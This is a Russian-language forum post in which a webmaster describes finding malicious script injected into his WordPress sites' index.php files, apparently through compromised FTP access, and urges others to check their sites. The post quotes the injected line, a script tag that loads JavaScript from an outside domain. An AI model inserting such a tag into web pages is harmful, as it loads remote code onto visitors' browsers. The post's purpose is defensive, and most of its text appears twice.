Здравствуйте. Думаю, данную тему нужно прочитать всем, может кто-то найдёт у себя тоже подобную неприятность.И так.
Вчера Я.Вебмастер определил, что один мой сайт безопасен: появился красный значок.
Сегодня полез разбираться и обнаружил в исходном коде (который выдаёт браузер) вот такую строчку:
И эта строчка шла сразу же после <html>Начал смотреть другие сайты этого же хостинга (мои сайты), тоже обнаруживал эту строчку. Иногда она стояла в боди, а иногда вместо был iframe.
Проанализировав всё, пришёл к выводу, что злоумышленник получил доступ по ftp (скорее всего программа).
Ну что ж, я начал шерстить все файлы. Большинство было - движки Вордпресс. Один сайт я просмотрел полностью. Файлы определял по дате изменения. Все index были изменены 10 марта.
Вредоносная строчка дописывалась всегда в файл index.php. Удалил всё, и будут мониторить дальше. Странный джаваскрипт с сайтов пропал.
Тех, кто зайдёт в данную тему, прошу проверить парочку своих сайтов (просто html главной страницы - это займёт у вас 5 секунд)
*Пароли естественно семенил.
Вот теперь думаю, где подхватил эту дрянь. Пару дней сидел без антивиря, быть может тогда...
Вчера Я.Вебмастер определил, что один мой сайт безопасен: появился красный значок.
Сегодня полез разбираться и обнаружил в исходном коде (который выдаёт браузер) вот такую строчку:
Код |
---|
<script src="http://bdnbah.info/style.js"></script><script src="http://bdnbah.info/style.js"></script> |
И эта строчка шла сразу же после <html>Начал смотреть другие сайты этого же хостинга (мои сайты), тоже обнаруживал эту строчку. Иногда она стояла в боди, а иногда вместо был iframe.
Проанализировав всё, пришёл к выводу, что злоумышленник получил доступ по ftp (скорее всего программа).
Ну что ж, я начал шерстить все файлы. Большинство было - движки Вордпресс. Один сайт я просмотрел полностью. Файлы определял по дате изменения. Все index были изменены 10 марта.
Вредоносная строчка дописывалась всегда в файл index.php. Удалил всё, и будут мониторить дальше. Странный джаваскрипт с сайтов пропал.
Тех, кто зайдёт в данную тему, прошу проверить парочку своих сайтов (просто html главной страницы - это займёт у вас 5 секунд)
*Пароли естественно семенил.
Вот теперь думаю, где подхватил эту дрянь. Пару дней сидел без антивиря, быть может тогда...
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про